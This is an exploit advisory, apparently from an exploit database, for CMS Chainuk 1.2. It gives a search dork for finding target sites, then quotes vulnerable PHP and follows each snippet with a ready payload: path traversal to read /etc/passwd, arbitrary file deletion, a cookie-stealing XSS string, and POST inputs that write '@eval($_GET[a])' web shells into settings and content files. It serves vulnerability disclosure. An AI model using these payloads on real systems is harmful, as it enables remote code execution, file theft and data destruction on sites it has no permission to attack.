CMS Chainuk <= 1.2 Multiple Remote Vulnerabilities

Exploit Code :

CMS Chainuk <= v.1.2 Vulns
Home: Cms.tut.su
Dork: "Cms.tut.su, 2009 g."

eLwaux(c) 14.06.2

## ## ## ## ## ##

LFI
/index.php
---------------------------------------------------------------------------

6: if (isset($_GET ['id']))
7: {
8: [color=white]$id = $_GET ['id'];[/color]
9: }
10: else
11: {
12: $id = $index;
13: }
14: if (file_exists ("content/" . $id . ".php"))
15: {
16: [color=white]include ("content/" . $id . ".php");[/color]
17: }
18: else
19: {
20: include ('404.html'); exit;
21: }
--------------------------------------------------------------------------

exploit:
index.php?id=../../../../etc/passwd%00

## ## ## ## ## ##

LFI
/admin/admin_edit.php
---------------------------------------------------------------------------

2: if (isset($_GET['id']))
3: {
4: [color=white]$id = $_GET['id'];[/color]
5: if (!file_exists("../content/" . $id . ".php")) die ("..");
6: [color=white]include("../content/" . $id . ".php");[/color]
23: }
---------------------------------------------------------------------------
--

exploit:
index.php?id=../../../../etc/passwd%00

## ## ## ## ## ##

delete any files ()
/admin/admin_delete.php[
---------------------------------------------------------------------------

3: if([color=white]unlink('../content/'.$_GET['id'].'.php')[/color])
4: {
5: echo 'Page '.$_GET['id'].' deleted';[/code]
---------------------------------------------------------------------------
--

exploit:
/admin/admin_delete.php?id=../FILE.PHP%00

## ## ## ## ## ##

LFI / XSS / Shell
/admin/admin_menu.php
---------------------------------------------------------------------------
--
37: $menu = explode (',', $_POST['menu']);
38: $csvcont ='';
39: foreach ($menu as $a)
40: {
41: if (!preg_match("/[0-9]/", $a)) die ("error");
42: if (!file_exists("../content/" . $a . ".php")) die ("error");
43: [color=white]include ("../content/" . $a . ".php");[/color]
44: $csvcont = $csvcont . $a . ";" . $page_4menu . "\n";
45: }
65: if (!file_put_contents("../menu.csv", $csvcont)) ..
---------------------------------------------------------------------------
--

exploits:
LFI POST: menu=../1/../FILE.PHP%00,1,2,3,4,5,6,7
XSS POST:
menu=../1../onmousemove="javascript:alert(document.cookies)">>/../index;,1,
2,3,4,5,6,7
Shell: if <asp_tags: On> POST: menu=../1
<asp=@eval(\$_GET[a]);asp>/../admin/passw,1,2,3,4,5,6,7
/?id=../menu.csv%00&a=phpinfo();[/CoDE]

## ## ## ## ## ##

Shell
/admin_settings.php
---------------------------------------------------------------------------
--
39: if (!isset($_POST['tmpl']) || !isset($_POST['id']) ||
!isset($_POST['menu']))
40: {
41: die ("...");
42: }
43: if (!file_exists("../templates/" . $_POST['tmpl'] .
"/index.php")) die ("...");
44: if (!file_exists("../content/" . $_POST['id'] . ".php")) die ("...");
45: $mtpl = $_POST['menu'];
46: $set = "<? \$curr_tmpl='" . $_POST['tmpl'] . "'; \$index="=
$_POST['id'] . "; \$menu_tmpl = \"" . $mtpl . "\"; ?>";
63: if (!file_put_contents("../settings.php", $set)
---------------------------------------------------------------------------
--

exploit:
POST: action=abc
tmpl=default
id=1
menu=%TITLE%"; @eval($_GET["a"]); ?> //[/code]
Shell: /settings.php?a=phpinfo();

## ## ## ## ## ##

Shell
/admin_new.php
---------------------------------------------------------------------------
--
POST: action=abc
text=abc
title='; @eval($_GET[a]); //
descr=abc
keys=abc
link=abc[/code]
/content/=NUMBER.php?a=phpinfo();

## ## ## ## ## ##

Path Disclosure
/index.php?id=../admin/passw
/admin/admin_delete.php?id=thisf0ld3risn0texi5s5

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason